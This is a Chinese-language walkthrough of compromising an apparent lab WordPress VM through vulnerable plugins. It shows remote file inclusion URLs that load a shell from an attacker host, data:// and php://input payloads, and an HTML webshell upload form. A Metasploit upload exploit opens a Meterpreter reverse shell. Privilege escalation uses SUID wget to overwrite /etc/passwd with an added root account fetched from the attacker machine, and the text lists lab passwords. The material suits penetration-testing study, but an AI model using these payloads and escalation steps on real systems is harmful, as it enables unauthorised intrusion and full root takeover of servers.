192.168.116.138 - - [26/Sep/2019 11:45:39] "GET /wp-load.php HTTP/1.0" 200 -
  • 访问http://192.168.116.138/wordpress/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://192.168.116.1:8000/,获取会话成功。

本地文件包含

  • 敏感信息:/etc/apache2/.htpasswd

  • 描述上说是本地文件包含,但是我测的时候可以远程文件包含,所以也获取命令执行更简单了。

  • 访问http://192.168.116.138/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=http://192.168.116.1:8000/shell.php就可以获取远程会话了。

  • 本地包含的思路有上传有恶意php代码的文件,找到上传路径,然后包含获取会话。

  • 然后可以包含日志文件可以想办法将一句话存进日志中,一般有Apache的访问日志,ssh链接的失败日志,这主要看服务器开放了哪些服务。但是这台就有点坑,只开了一个Apache,还读不了日志。
  • 但是还是有办法的,还有php支持的各种协议。
1
2
3
http://192.168.116.138/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=data://text/plain;base64,PD9waHAgIHBocGluZm8oKTs/Pg==

➜ ~ curl "http://192.168.116.138/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=php://input" -d "<?php phpinfo();?>"
  • 在PHPinfo里看到支持的协议还挺多的
1
https, ftps, compress.zlib, php, file, glob, data, http, ftp, compress.bzip2, phar, zip
  • 一句话木马我就不演示了。

文件上传

1
2
3
4
<form method="POST" action="http://192.168.116.138/wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2019&Month=09" enctype="multipart/form-data" >
<input type="file" name="qqfile"><br>
<input type="submit" name="Submit" value="Pwn!">
</form>
  • 浏览器打开,选择木马上传,打开上传目录访问木马,就可以了。

CSRF越权

1
Admin Password: Ignite@123
1
2
3
Second Flag: 5DD1CC591CE1569A528E3BCF18CEEB5B

RootPassword: SWduaXRlQDEyMw==
  • 密码都是一样的。

插件认证文件上传

  • 上面有一个利用要用到密码,我都拿到密码了,我还要用exp?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
msf5 exploit(unix/webapp/wp_slideshowgallery_upload) > show options 

Module options (exploit/unix/webapp/wp_slideshowgallery_upload):

Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.116.138 yes The target address range or CIDR identifier
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /wordpress yes The base path to the wordpress application
VHOST no HTTP server virtual host
WP_PASSWORD [email protected] yes Valid password for the provided username
WP_USER admin yes A valid username


Exploit target:

Id Name
-- ----
0 WP SlideShow Gallery 1.4.6


msf5 exploit(unix/webapp/wp_slideshowgallery_upload) > run

[*] Started reverse TCP handler on 192.168.116.1:4444
[*] Trying to login as admin
[*] Trying to upload payload
[*] Uploading payload
[*] Calling uploaded file gxwuywll.php
[*] Sending stage (38247 bytes) to 192.168.116.138
[*] Meterpreter session 2 opened (192.168.116.1:4444 -> 192.168.116.138:41014) at 2019-09-26 18:24:09 +0800
[+] Deleted gxwuywll.php

meterpreter >
  • 情节需要,不管了。

提Root权权限

  • 随便选一个session,进入Shell,查找SUID权限文件。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
meterpreter > shell
Process 2084 created.
Channel 0 created.
[email protected]:/var/www$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/sbin/pppd
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/arping
/usr/bin/wget
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
/usr/bin/vmware-user-suid-wrapper
/usr/lib/xorg/Xorg.wrap
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/bin/fusermount
/bin/umount
/bin/mount
/bin/ping
/bin/cp
/bin/su
/snap/core/6350/bin/mount
/snap/core/6350/bin/ping
/snap/core/6350/bin/ping6
/snap/core/6350/bin/su
/snap/core/6350/bin/umount
/snap/core/6350/usr/bin/chfn
/snap/core/6350/usr/bin/chsh
/snap/core/6350/usr/bin/gpasswd
/snap/core/6350/usr/bin/newgrp
/snap/core/6350/usr/bin/passwd
/snap/core/6350/usr/bin/sudo
/snap/core/6350/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/6350/usr/lib/openssh/ssh-keysign
/snap/core/6350/usr/lib/snapd/snap-confine
/snap/core/6350/usr/sbin/pppd
[email protected]:/var/www$
  • 看到有cp和wget命令,两个都能覆盖文件,就是把passwd文件改了
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
[email protected]:/etc$ wget -O passwd http://192.168.116.1:8000/passwd
wget -O passwd http://192.168.116.1:8000/passwd
ERROR: could not open HSTS store. HSTS will be disabled.
--2019-09-26 11:54:08-- http://192.168.116.1:8000/passwd
Connecting to 192.168.116.1:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2557 (2.5K) [application/octet-stream]
Saving to: 'passwd'

passwd 100%[===================>] 2.50K --.-KB/s in 0.001s

2019-09-26 11:54:08 (2.86 MB/s) - 'passwd' saved [2557/2557]

[email protected]:/etc$ cat passwd
cat passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:111::/run/uuidd:/usr/sbin/nologin
avahi-autoipd:x:106:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
rtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
cups-pk-helper:x:110:116:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
whoopsie:x:112:117::/nonexistent:/bin/false
kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:114:119::/var/lib/saned:/usr/sbin/nologin
pulse:x:115:120:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
avahi:x:116:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
colord:x:117:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:118:7:HPLIP system user,,,:/var/run/hplip:/bin/false
geoclue:x:119:124::/var/lib/geoclue:/usr/sbin/nologin
gnome-initial-setup:x:120:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
raj:x:1000:1000:raj,,,:/home/raj:/bin/bash
mysql:x:122:128:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:124:65534::/run/sshd:/usr/sbin/nologin
kt:$1$kt$mR/jSFSDV/G0vNQ72T8cs.:0:0:root:/root:/bin/bash
[email protected]:/etc$ su kt
su kt
Password: 123

[email protected]:/etc# id
id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:/etc#

获取Flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
[email protected]:/etc# cd /root
cd /root
[email protected]:~# ls
ls
proof.txt
[email protected]:~# cat proof.txt
cat proof.txt
_________________________________________________________________________
_____ _ _ U _____ u U _____ u _ _ ____ |
|_ " _| |'| |'| \| ___"|/ \| ___"|/ | \ |"| | _"\ |
| | /| |_| |\ | _|" | _|" <| \| |> /| | | | |
/| |\ U| _ |u | |___ | |___ U| |\ |u U| |_| |\ |
u |_|U |_| |_| |_____| |_____| |_| \_| |____/ u |
_// \\_ // \\ << >> << >> || \\,-. |||_ |
(__) (__) (_") ("_) (__) (__) (__) (__) (_") (_/ (__)_) |
|
|
!! Congrats you have finished this task !! |
|
Contact us here: |
|
Hacking Articles : https://twitter.com/rajchandel/ |
|
|
+-+-+-+-+-+ +-+-+-+-+-+-+-+ |
|E|n|j|o|y| |H|A|C|K|I|N|G| |
+-+-+-+-+-+ +-+-+-+-+-+-+-+ |
________________________________________________________________________|



[email protected]:~#